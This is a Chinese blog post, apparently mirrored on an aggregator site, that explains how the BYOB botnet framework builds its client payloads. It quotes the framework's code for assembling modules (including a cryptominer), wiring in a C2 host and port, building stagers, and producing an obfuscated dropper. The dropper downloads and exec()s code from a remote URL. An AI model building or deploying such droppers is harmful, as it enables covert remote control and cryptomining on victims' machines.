byob payload 生成过程

Posted Nones

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了byob payload 生成过程相关的知识,希望对你有一定的参考价值。

提示

  • 个人博客首页
  • 免责声明:仅供学习交流使用!开源框架可能存在的风险和相关后果将完全由用户自行承担,本人不承担任何法律责任。

1. byob web 介绍

1.1 平台主要组件

1.1.1 fask
1.1.2 SQLAlchemy
1.1.3 threading
1.1.4 socket
1.1.5 ***

1.2 攻击过程python 文件为例

1.2.1 生成过程 (route("/api/payload/generate")

1.2.1.1 client.main(**kwargs)
  1. models: 构建 client payload 的主要模块
modules = [\'modules/util.py\',\'core/security.py\',\'core/payloads.py\', \'core/miner.py\']
# util.py 许多模块使用的杂项实用函数 
# security.py 提供加密,膜拜,后续再慢慢分析 之前一直用的 pycryptomode
# payloads.py 提供 payloads 的socket 连接
# miner.py 矿工脚本

  1. imports: 构建 client payload 的主要模块中的导入非本地库
for x in [\'core\'] + [os.path.splitext(i)[0] for i in os.listdir(\'core\')] + [\'core.%s\' % s for s in [os.path.splitext(i)[0] for i in os.listdir(\'core\')]]:
    if x in line:
        break
else:
    imports.add(line.strip())
# imports 返回获取 modules 中的 import packets(排除 byob 本地文件包)
  1. hidden:获取 moduls imports 中主要的 packets
for line in kwargs[\'imports\']:
    if len(line.split()) > 1:
        for i in str().join(line.split()[1:]).split(\';\')[0].split(\',\'):
            i = line.split()[1] if i == \'*\' else i
            hidden.add(i)
# hidden 排除 imports 中的 \'import\' 字符
  1. payloads: 主要的功能函数

loader  = open(\'core/loader.py\',\'r\').read()#, generators.loader(host=C2_HOST, port=int(C2_PORT)+2, packages=list(kwargs[\'hidden\']))))
# 加载 core/loader.py 

test_imports = \'\\n\'.join([\'import \' + i for i in list(kwargs[\'hidden\']) if i not in [\'StringIO\',\'_winreg\',\'pycryptonight\',\'pyrx\',\'ctypes\']])
# 导入 packets

potential_imports = \'\'\'
try:
    import pycryptonight
    import pyrx
except ImportError: pass
\'\'\'
# 可能导入的 packets

modules = \'\\n\'.join(([open(module,\'r\').read().partition(\'# main\')[2] for module in kwargs[\'modules\']] + [generators.main(\'Payload\', **"host": C2_HOST, "port": C2_PORT, "pastebin": options.pastebin if options.pastebin else str(), "gui": "1" if options.gui else str(), "owner": options.owner) + \'_payload.run()\']))
# 读取 modules 数组内的文件名称,并截取 # main 后的数据
# 加上 generators.main() 构造的 main template
# 最后拼接 _payload.run() 

payload = \'\\n\'.join((loader, test_imports, potential_imports, modules))
# 将上述数据拼接成 payload

  1. stagers: 获取独特的payload
if options.encrypt:
   stager = open(\'core/stagers.py\', \'r\').read() + generators.main(\'run\', url=kwargs[\'url\'], key=kwargs[\'key\'])
else:
   stager = open(\'core/stagers.py\', \'r\').read() + generators.main(\'run\', url=kwargs[\'url\'])
# 获取 core/stagers.py 
# 并拼接  _run(url) 
  1. dropper: 获取 stagers
 dropper = """import sys,zlib,base64,marshal,json,urllib
if sys.version_info[0] > 2:
    from urllib import request
urlopen = urllib.request.urlopen if sys.version_info[0] > 2 else urllib.urlopen
exec(eval(marshal.loads(zlib.decompress(base64.b64decode()))))""".format(repr(base64.b64encode(zlib.compress(marshal.dumps("urlopen().read()".format(repr(kwargs[\'url\'])),2)))))
# 生成 dropper

参考资料


交个朋友

  • github learnselfs

以上是关于byob payload 生成过程的主要内容,如果未能解决你的问题,请参考以下文章

MSF常用payload生成

msf生成payload大全

免杀Payload生成工具Veil的下载与使用

msf生成各个平台payload

msfvenom生成各类Payload命令

渗透测试之Payload